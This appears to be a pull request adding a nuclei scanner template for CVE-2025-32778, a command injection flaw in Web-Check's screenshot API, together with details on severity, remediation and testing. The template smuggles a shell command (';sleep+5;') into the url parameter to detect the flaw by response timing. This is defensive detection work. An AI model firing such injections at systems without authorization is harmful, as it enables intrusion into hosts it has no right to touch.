### PR TITLE
Add CVE-2025-32778: Web-Check Command Injection via Screenshot API

### DIFF
--- a/http/cves/2025/CVE-2025-32778.yaml
+++ b/http/cves/2025/CVE-2025-32778.yaml
@@ -2,7 +2,7 @@ id: CVE-2025-32778
 
 info:
   name: Web-Check - Command Injection via Screenshot API
-  author: omarkurt
+  author: tx1ee
   severity: critical
   description: |
     Web-Check versions prior to 2.0.1 contain a command injection vulnerability

--- a/http/cves/2025/CVE-2025-32778.yaml
+++ b/http/cves/2025/CVE-2025-32778.yaml
@@ -1,0 +1,52 @@
+id: CVE-2025-32778
+
+info:
+  name: Web-Check - Command Injection via Screenshot API
+  author: omarkurt
+  severity: critical
+  description: |
+    Web-Check versions prior to 2.0.1 contain a command injection vulnerability
+    in the /api/screenshot endpoint. The directChromiumScreenshot() function uses
+    child_process.exec() with unsanitized user input, allowing unauthenticated
+    remote code execution via shell metacharacters in the url query parameter.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary system commands on the
+    underlying host by sending specially crafted requests to the /api/screenshot
+    endpoint. The application typically runs as root in Docker containers, allowing
+    complete system compromise.
+  remediation: |
+    Update to Web-Check version 2.0.1 or later. The fix replaces child_process.exec()
+    with child_process.execFile() which avoids shell interpretation.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-32778
+    - https://github.com/Lissy93/web-check/security/advisories/GHSA-5qg5-g7c2-pfx8
+    - https://github.com/Lissy93/web-check/commit/0e4958aa10b2650d32439a799f6fc83a7cd46cef
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
+    cvss-score: 9.3
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.title:"Web-Check"
+  tags: cve,cve2025,rce,web-check,command-injection
+
+http:
+  - raw:
+      - |
+        GET /api/screenshot?url=http://example.com?a=";sleep+0;" HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+
+      - |
+        GET /api/screenshot?url=http://example.com?a=";sleep+5;" HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration_2 - duration_1 >= 4"
+        condition: and
+# digest: 490a00463044022072fb917d872a56422ccb60872bb72b6cd41fce930b5062048f5fda94be4e037a02203fe611c0c20f257154d594cd038dec72cea1395bcad6b70087f5c6e1da634dcd:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Summary

Added nuclei template for **CVE-2025-32778** - Web-Check Command Injection vulnerability.

### Vulnerability Details

- **Product**: Web-Check (Lissy93/web-check)
- **Type**: Command Injection (CWE-78)
- **Severity**: Critical (CVSS 9.3)
- **Affected Versions**: < 2.0.1
- **Endpoint**: `/api/screenshot`

### Detection Method

Time-based blind detection using `sleep` command comparison:
1. Baseline request with `sleep+0`
2. Malicious request with `sleep+5`
3. Compares response time difference (threshold: >= 4 seconds)

### Testing

- ✅ Tested on vulnerable version (v2.0.0) - Detected
- ✅ Tested on fixed version (v2.0.2) - No false positive
- Manual verification: `sleep+0` = ~2s, `sleep+5` = ~7s (5s difference)

### References

- https://nvd.nist.gov/vuln/detail/CVE-2025-32778
- https://github.com/Lissy93/web-check/security/advisories/GHSA-5qg5-g7c2-pfx8
- https://github.com/Lissy93/web-check/commit/0e4958aa10b2650d32439a799f6fc83a7cd46cef

### Notes

Template follows official nuclei-templates contribution guidelines with proper metadata, classification, and remediation information.